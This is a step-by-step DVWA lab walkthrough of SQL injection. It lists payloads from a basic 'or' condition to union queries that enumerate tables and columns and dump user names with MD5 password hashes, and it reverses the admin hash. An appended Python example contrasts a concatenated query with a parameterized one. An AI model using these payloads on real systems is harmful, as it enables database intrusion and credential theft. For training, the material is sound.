Based on DVWA
1.
Code: 1' or '1'='1 => the condition becomes '1' or '1' = '1'
Result:
2.
Code: 1' (injection point) order by 2 (sorting) # (comment character)
Result:
3.
Code: 1' union select 1,2# (break into the database)
Result:
4.
Code: 1' union select 1,database()# (find the database)
Result:
5.
Code: (list the tables)
1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema= 'dvwa')#
Result:
6.
Code: (find the columns of the guestbook table)
1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='guestbook')#
Result:
7.
Code: (find the columns of the users table)
1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users')#
Result:
8.
Code: (find the actual usernames and passwords)
1' union select 1,(select group_concat(user," : ",password) from users)#
Result:
Reversing the hash with Cmd5:
user: admin
password: 5f4dcc3b5aa765d61d8327deb882cf99 => password
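
Why every step above works, and what stops it, as an added example that is not part of the original page or of DVWA's code: the lookup is built by string concatenation, so the quote in the input ends the literal; a bound parameter keeps the same input as data. Assumptions: SQLite stands in for MySQL, the `first_name`/`last_name` columns and all rows are constructed sample data, and the function names are hypothetical.

```python
import hashlib
import sqlite3

def md5_hex(text):
    # Unsalted MD5, the storage format of the hash recovered in step 8.
    return hashlib.md5(text.encode()).hexdigest()

def make_db():
    # Constructed sample data; only the users table and its user/password
    # columns come from the page, the rest is assumed for illustration.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, "
               "last_name TEXT, user TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        ("1", "admin", "admin", "admin", md5_hex("password")),
        ("2", "Sample", "Two", "sample2", md5_hex("constructed-2")),
        ("3", "Sample", "Three", "sample3", md5_hex("constructed-3")),
    ])
    return db

def lookup_vulnerable(db, user_id):
    # Input is pasted into the SQL text, so a quote inside it closes the
    # string literal and the remainder is parsed as SQL.
    sql = ("SELECT first_name, last_name FROM users "
           "WHERE user_id = '" + user_id + "'")
    return db.execute(sql).fetchall()

def lookup_parameterized(db, user_id):
    # The statement text is fixed; the input travels separately as a bound
    # value and is only ever compared against user_id.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    payload = "1' or '1'='1"  # input from step 1 of the page
    print("concatenated :", lookup_vulnerable(db, payload))
    print("parameterized:", lookup_parameterized(db, payload))
    print("normal lookup:", lookup_parameterized(db, "1"))
    # The recovered hash is plain MD5 of a common word, so a lookup
    # table reverses it; a salted, slow password hash would not match.
    print("md5('password') =", md5_hex("password"))
```
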